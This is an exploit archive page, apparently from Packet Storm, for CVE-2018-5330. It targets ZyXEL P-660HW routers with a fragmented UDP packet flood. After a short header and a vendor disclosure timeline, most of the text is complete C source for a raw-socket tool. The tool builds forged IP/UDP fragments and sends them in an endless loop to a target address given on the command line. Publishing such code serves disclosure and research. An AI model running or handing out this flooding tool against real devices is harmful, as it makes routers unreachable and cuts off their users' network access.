what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ZyXEL P-660HW UDP Denial Of Service

ZyXEL P-660HW UDP Denial Of Service
Posted Jan 12, 2018
Authored by Hosein Askari

ZyXEL P-660HW suffers from a UDP fragmentation denial of service vulnerability.

tags | exploit, denial of service, udp
advisories | CVE-2018-5330
SHA-256 | 3e6afd92f56224f00f5636f2eafc877e4a6d54d52ead421fcfe460c731f69208

ZyXEL P-660HW UDP Denial Of Service

Change Mirror Download
################
#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service
CVE: CVE-2018-5330
#CWE: CWE-400
#Exploit Author: Hosein Askari
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#description: ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.
#####################
Vendor status:
[02.01.2018] Vulnerability discovered
[04.01.2018] CVE requestion
[10.01.2018] CVE assigned
[10.01.2018] Contact with the vendor
[11.01.2018] Vendor responds asking for details
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)
[11.01.2018] Vendor assigns appropriate team for coordination
[11.01.2018] Vendor is analyzing the issue
[12.01.2018] Asked vendor for confirmation
[12.01.2018] Vendor replies with confirmation of the issue
#####################
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define change(n) (n)
#else
#define change(n) htons(n)
#endif
#define ip_1 8193
#define head 153
#define u_head 41
#define level 0
// Exploit Author : Hosein Askar
u_long p_rec(u_char *);
void running(u_char *);
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{

int j = 1, i, socks, counter=1, number=1;
u_long s_ip = 0;
u_long d_ip = 0;
u_short s_port = 0;
u_short d_port = 0;
if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("Error");
exit(1);
}
if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)
{
perror("Error");
exit(1);
}

if (argc < 2) running(argv[0]);
if (!(d_ip = p_rec(argv[1])))
{
exit(1);
}

fprintf(stderr, "Attack is started \n");

for (;;) {
counter ++;
s_ip = counter*10;
s_port = counter*10;
d_port = counter+1*10;
if (counter>10)
counter = 1;
for (i = 0; i < 10; i++)
{
fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);
}
}
return (0);
}
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)
{
u_char *p = NULL, *pointer = NULL;
u_char byte;
struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = s_port;
sin.sin_addr.s_addr = d_ip;

p = (u_char *)malloc(head + u_head + level);
pointer = p;

byte = 69;
memcpy(pointer, &byte, sizeof(u_char));
pointer += 2;
*((u_short *)pointer) = change(head + u_head + level);
pointer += 2;
*((u_short *)pointer) = htons(number);
pointer += 2;
*((u_short *)pointer) |= change(ip_1);
pointer += 2;
*((u_short *)pointer) = 247;
byte = IPPROTO_UDP;
memcpy(pointer + 1, &byte, sizeof(u_char));
pointer += 4;
*((u_long *)pointer) = s_ip;
pointer += 4;
*((u_long *)pointer) = d_ip;
pointer += 4;
*((u_short *)pointer) = htons(s_port);
pointer += 2;
*((u_short *)pointer) = htons(d_port);
pointer += 2;
*((u_short *)pointer) = htons(8);
if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(p);
exit(1);
}
free(p);
}
u_long p_rec(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void running(u_char *name)
{
fprintf(stderr,
"%s d_ip\n",
name);
exit(0);
}
##########################


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close